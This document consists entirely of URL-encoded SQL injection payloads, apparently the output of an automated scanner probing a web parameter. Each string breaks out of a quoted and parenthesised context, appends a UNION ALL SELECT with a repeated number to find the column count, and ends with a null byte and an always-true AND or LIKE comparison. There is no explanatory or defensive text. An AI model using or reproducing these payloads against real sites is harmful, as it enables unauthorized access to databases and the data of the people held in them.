-3016%27%29%20UNION%20ALL%20SELECT%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%2C%207707%00%20AND%20%28%27nNGH%27%3D%27nNGH -3460%27%29%20UNION%20ALL%20SELECT%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%2C%203596%00%20AND%20%28%27DgOS%27%3D%27DgOS -7311%27%29%20UNION%20ALL%20SELECT%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%2C%203856%00%20AND%20%28%27Wgct%27%3D%27Wgct -9124%27%29%29%20UNION%20ALL%20SELECT%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%2C%201004%00%20AND%20%28%28%27qOot%27%3D%27qOot -4074%27%29%29%20UNION%20ALL%20SELECT%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%2C%208537%00%20AND%20%28%28%27YSpj%27%3D%27YSpj -4147%27%29%29%20UNION%20ALL%20SELECT%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%2C%206552%00%20AND%20%28%28%27jKPb%27%3D%27jKPb -4637%27%29%29%20UNION%20ALL%20SELECT%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%2C%203119%00%20AND%20%28%28%27PNFI%27%3D%27PNFI -3731%27%29%29%20UNION%20ALL%20SELECT%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%00%20AND%20%28%28%27DoTA%27%3D%27DoTA -3857%27%29%29%20UNION%20ALL%20SELECT%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%2C%202817%00%20AND%20%28%28%27Rntj%27%3D%27Rntj -3246%27%29%29%20UNION%20ALL%20SELECT%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%00%20AND%20%28%28%27wtqq%27%3D%27wtqq -3829%27%29%29%20UNION%20ALL%20SELECT%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%2C%205824%00%20AND%20%28%28%27chdx%27%3D%27chdx -4154%27%29%29%20UNION%20ALL%20SELECT%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%00%20AND%20%28%28%27ghpZ%27%3D%27ghpZ -5000%27%29%29%20UNION%20ALL%20SELECT%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%2C%202777%00%20AND%20%28%28%27YoFW%27%3D%27YoFW -1341%27%29%29%29%20UNION%20ALL%20SELECT%202407%2C%202407%2C%202407%2C%202407%2C%202407%2C%202407%2C%202407%2C%202407%2C%202407%2C%202407%2C%202407%00%20AND%20%28%28%28%27jTiD%27%3D%27jTiD -2329%27%29%29%29%20UNION%20ALL%20SELECT%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%2C%201303%00%20AND%20%28%28%28%27zbdX%27%3D%27zbdX -2833%27%29%29%29%20UNION%20ALL%20SELECT%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%00%20AND%20%28%28%28%27adTm%27%3D%27adTm -3115%27%29%29%29%20UNION%20ALL%20SELECT%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%2C%202462%00%20AND%20%28%28%28%27KQQN%27%3D%27KQQN -1867%27%29%29%29%20UNION%20ALL%20SELECT%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%00%20AND%20%28%28%28%27prZD%27%3D%27prZD -4065%27%29%29%29%20UNION%20ALL%20SELECT%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%00%20AND%20%28%28%28%27bitH%27%3D%27bitH -8686%27%29%29%29%20UNION%20ALL%20SELECT%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%2C%207187%00%20AND%20%28%28%28%27PiIT%27%3D%27PiIT -9301%27%29%29%29%20UNION%20ALL%20SELECT%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%00%20AND%20%28%28%28%27EfBy%27%3D%27EfBy -1593%27%29%29%29%20UNION%20ALL%20SELECT%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%2C%209497%00%20AND%20%28%28%28%27VBEH%27%3D%27VBEH -1936%27%29%29%29%20UNION%20ALL%20SELECT%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%00%20AND%20%28%28%28%27QqlE%27%3D%27QqlE -2843%27%20UNION%20ALL%20SELECT%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%00%20AND%20%27eJKY%27%3D%27eJKY -6012%27%20UNION%20ALL%20SELECT%206433%2C%206433%2C%206433%2C%206433%2C%206433%2C%206433%2C%206433%2C%206433%2C%206433%2C%206433%2C%206433%2C%206433%00%20AND%20%27Eowg%27%3D%27Eowg -6438%27%20UNION%20ALL%20SELECT%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%00%20AND%20%27sXKJ%27%3D%27sXKJ -9910%27%20UNION%20ALL%20SELECT%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%2C%202317%00%20AND%20%27PtGO%27%3D%27PtGO -3707%27%20UNION%20ALL%20SELECT%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%2C%203589%00%20AND%20%27WAVm%27%3D%27WAVm -4565%27%20UNION%20ALL%20SELECT%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%2C%201817%00%20AND%20%27yoNl%27%3D%27yoNl -8623%27%20UNION%20ALL%20SELECT%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%2C%203420%00%20AND%20%27Wetx%27%3D%27Wetx -4067%27%20UNION%20ALL%20SELECT%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%2C%201825%00%20AND%20%27FUcW%27%3D%27FUcW -6382%27%20UNION%20ALL%20SELECT%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%2C%205759%00%20AND%20%27Lilf%27%3D%27Lilf -3653%27%20UNION%20ALL%20SELECT%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%2C%207038%00%20AND%20%27MNyK%27%3D%27MNyK -7596%27%29%20UNION%20ALL%20SELECT%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%2C%206574%00%20AND%20%28%27zDWd%27%20LIKE%20%27zDWd -8459%27%29%20UNION%20ALL%20SELECT%206130%2C%206130%2C%206130%2C%206130%2C%206130%2C%206130%2C%206130%2C%206130%2C%206130%2C%206130%2C%206130%2C%206130%00%20AND%20%28%27pGxx%27%20LIKE%20%27pGxx -9251%27%29%20UNION%20ALL%20SELECT%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%2C%203291%00%20AND%20%28%27jxeu%27%20LIKE%20%27jxeu -3997%27%29%20UNION%20ALL%20SELECT%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%00%20AND%20%28%27Zgnb%27%20LIKE%20%27Zgnb -1624%27%29%20UNION%20ALL%20SELECT%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%00%20AND%20%28%27UqSX%27%20LIKE%20%27UqSX -6024%27%29%20UNION%20ALL%20SELECT%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%2C%209994%00%20AND%20%28%27ZZyZ%27%20LIKE%20%27ZZyZ -7667%27%29%20UNION%20ALL%20SELECT%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%2C%207974%00%20AND%20%28%27yXyx%27%20LIKE%20%27yXyx -4891%27%29%20UNION%20ALL%20SELECT%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%2C%201771%00%20AND%20%28%27pEJt%27%20LIKE%20%27pEJt -8555%27%29%20UNION%20ALL%20SELECT%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%2C%203986%00%20AND%20%28%27Xtcl%27%20LIKE%20%27Xtcl -5025%27%29%20UNION%20ALL%20SELECT%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%2C%205700%00%20AND%20%28%27mBLQ%27%20LIKE%20%27mBLQ -5469%27%29%29%20UNION%20ALL%20SELECT%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%00%20AND%20%28%28%27Tapo%27%20LIKE%20%27Tapo -7933%27%29%29%20UNION%20ALL%20SELECT%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%00%20AND%20%28%28%27FkYJ%27%20LIKE%20%27FkYJ -5706%27%29%29%20UNION%20ALL%20SELECT%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%2C%204309%00%20AND%20%28%28%27kKYA%27%20LIKE%20%27kKYA -8361%27%29%29%20UNION%20ALL%20SELECT%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%00%20AND%20%28%28%27rZMi%27%20LIKE%20%27rZMi -9906%27%29%29%20UNION%20ALL%20SELECT%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%2C%208072%00%20AND%20%28%28%27IIvF%27%20LIKE%20%27IIvF -2511%27%29%29%20UNION%20ALL%20SELECT%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%2C%205027%00%20AND%20%28%28%27VTGW%27%20LIKE%20%27VTGW -5383%27%29%29%20UNION%20ALL%20SELECT%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%00%20AND%20%28%28%27jeUp%27%20LIKE%20%27jeUp -1335%27%29%29%20UNION%20ALL%20SELECT%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%00%20AND%20%28%28%27VxMN%27%20LIKE%20%27VxMN -1860%27%29%29%20UNION%20ALL%20SELECT%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%2C%201034%00%20AND%20%28%28%27fdDi%27%20LIKE%20%27fdDi -8770%27%29%29%20UNION%20ALL%20SELECT%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%00%20AND%20%28%28%27xfkI%27%20LIKE%20%27xfkI -7273%27%29%29%29%20UNION%20ALL%20SELECT%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%2C%205749%00%20AND%20%28%28%28%27EjOJ%27%20LIKE%20%27EjOJ -8156%27%29%29%29%20UNION%20ALL%20SELECT%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%2C%209808%00%20AND%20%28%28%28%27NIdX%27%20LIKE%20%27NIdX -8229%27%29%29%29%20UNION%20ALL%20SELECT%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%2C%204880%00%20AND%20%28%28%28%27qTru%27%20LIKE%20%27qTru -3135%27%29%29%29%20UNION%20ALL%20SELECT%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%00%20AND%20%28%28%28%27ATRy%27%20LIKE%20%27ATRy -4160%27%29%29%29%20UNION%20ALL%20SELECT%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%00%20AND%20%28%28%28%27arst%27%20LIKE%20%27arst -1607%27%29%29%29%20UNION%20ALL%20SELECT%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%00%20AND%20%28%28%28%27HoWs%27%20LIKE%20%27HoWs -3725%27%29%29%29%20UNION%20ALL%20SELECT%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%2C%208518%00%20AND%20%28%28%28%27erxZ%27%20LIKE%20%27erxZ -7815%27%29%29%29%20UNION%20ALL%20SELECT%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%2C%204428%00%20AND%20%28%28%28%27NDsi%27%20LIKE%20%27NDsi -6317%27%29%29%29%20UNION%20ALL%20SELECT%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%00%20AND%20%28%28%28%27OZUG%27%20LIKE%20%27OZUG -2474%27%29%29%29%20UNION%20ALL%20SELECT%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%2C%201356%00%20AND%20%28%28%28%27laFV%27%20LIKE%20%27laFV -9708%27%20UNION%20ALL%20SELECT%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%00%20AND%20%27NiYM%27%20LIKE%20%27NiYM -9176%27%20UNION%20ALL%20SELECT%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%00%20AND%20%27DtBr%27%20LIKE%20%27DtBr -4550%27%20UNION%20ALL%20SELECT%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%2C%205539%00%20AND%20%27UreF%27%20LIKE%20%27UreF -7097%27%20UNION%20ALL%20SELECT%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%2C%203812%00%20AND%20%27LMDc%27%20LIKE%20%27LMDc -7179%27%20UNION%20ALL%20SELECT%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%2C%208090%00%20AND%20%27Tmvc%27%20LIKE%20%27Tmvc -5048%27%20UNION%20ALL%20SELECT%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%00%20AND%20%27aBfD%27%20LIKE%20%27aBfD -5629%27%20UNION%20ALL%20SELECT%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%2C%201801%00%20AND%20%27sUys%27%20LIKE%20%27sUys -2741%27%20UNION%20ALL%20SELECT%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%00%20AND%20%27rfXQ%27%20LIKE%20%27rfXQ -9869%27%20UNION%20ALL%20SELECT%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%2C%203441%00%20AND%20%27kguS%27%20LIKE%20%27kguS -1710%27%20UNION%20ALL%20SELECT%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%2C%207300%00%20AND%20%27VsHQ%27%20LIKE%20%27VsHQ -8502%22%29%20UNION%20ALL%20SELECT%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%00%20AND%20%28%22bMrU%22%3D%22bMrU -5258%22%29%20UNION%20ALL%20SELECT%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%00%20AND%20%28%22saUB%22%3D%22saUB -6522%22%29%20UNION%20ALL%20SELECT%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%2C%207553%00%20AND%20%28%22ZolX%22%3D%22ZolX -1156%22%29%20UNION%20ALL%20SELECT%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%00%20AND%20%28%22yQbV%22%3D%22yQbV -6227%22%29%20UNION%20ALL%20SELECT%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%2C%208152%00%20AND%20%28%22Rcrf%22%3D%22Rcrf -4062%22%29%20UNION%20ALL%20SELECT%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%00%20AND%20%28%22oPAy%22%3D%22oPAy -7186%22%29%20UNION%20ALL%20SELECT%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%00%20AND%20%28%22dmJZ%22%3D%22dmJZ -4076%22%29%20UNION%20ALL%20SELECT%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%2C%204242%00%20AND%20%28%22juWq%22%3D%22juWq -6698%22%29%20UNION%20ALL%20SELECT%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%00%20AND%20%28%22KIEX%22%3D%22KIEX -3034%22%29%20UNION%20ALL%20SELECT%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%00%20AND%20%28%22DgZc%22%3D%22DgZc -3268%22%29%29%20UNION%20ALL%20SELECT%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%2C%205123%00%20AND%20%28%28%22CDME%22%3D%22CDME -4517%22%29%29%20UNION%20ALL%20SELECT%206816%2C%206816%2C%206816%2C%206816%2C%206816%2C%206816%2C%206816%2C%206816%2C%206816%2C%206816%2C%206816%2C%206816%00%20AND%20%28%28%22MOda%22%3D%22MOda -9536%22%29%29%20UNION%20ALL%20SELECT%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%2C%209569%00%20AND%20%28%28%22yLRE%22%3D%22yLRE -7687%22%29%29%20UNION%20ALL%20SELECT%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%2C%203825%00%20AND%20%28%28%22YSta%22%3D%22YSta -3059%22%29%29%20UNION%20ALL%20SELECT%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%2C%208399%00%20AND%20%28%28%22TTmH%22%3D%22TTmH -5934%22%29%29%20UNION%20ALL%20SELECT%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%2C%202458%00%20AND%20%28%28%22wmNa%22%3D%22wmNa -1606%22%29%29%20UNION%20ALL%20SELECT%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%2C%201481%00%20AND%20%28%28%22pHqN%22%3D%22pHqN -4904%22%29%29%20UNION%20ALL%20SELECT%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%2C%204184%00%20AND%20%28%28%22BFqF%22%3D%22BFqF -2991%22%29%29%20UNION%20ALL%20SELECT%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%00%20AND%20%28%28%22xfCg%22%3D%22xfCg -4699%22%29%29%20UNION%20ALL%20SELECT%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%00%20AND%20%28%28%22AUge%22%3D%22AUge -3254%22%29%29%29%20UNION%20ALL%20SELECT%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%00%20AND%20%28%28%28%22BmSR%22%3D%22BmSR -1855%22%29%29%29%20UNION%20ALL%20SELECT%205298%2C%205298%2C%205298%2C%205298%2C%205298%2C%205298%2C%205298%2C%205298%2C%205298%2C%205298%2C%205298%2C%205298%00%20AND%20%28%28%28%22SnXI%22%3D%22SnXI -4741%22%29%29%29%20UNION%20ALL%20SELECT%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%2C%204906%00%20AND%20%28%28%28%22qEQw%22%3D%22qEQw -3875%22%29%29%29%20UNION%20ALL%20SELECT%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%2C%206925%00%20AND%20%28%28%28%22QNdm%22%3D%22QNdm -4649%22%29%29%29%20UNION%20ALL%20SELECT%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%2C%202868%00%20AND%20%28%28%28%22iCVa%22%3D%22iCVa -4699%22%29%29%29%20UNION%20ALL%20SELECT%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%2C%209389%00%20AND%20%28%28%28%22dLHo%22%3D%22dLHo -8327%22%29%29%29%20UNION%20ALL%20SELECT%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%2C%201258%00%20AND%20%28%28%28%22pbNO%22%3D%22pbNO -1993%22%29%29%29%20UNION%20ALL%20SELECT%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%2C%206052%00%20AND%20%28%28%28%22NVgi%22%3D%22NVgi -2733%22%29%29%29%20UNION%20ALL%20SELECT%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%00%20AND%20%28%28%28%22dETe%22%3D%22dETe -1052%22%29%29%29%20UNION%20ALL%20SELECT%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%00%20AND%20%28%28%28%22BODL%22%3D%22BODL 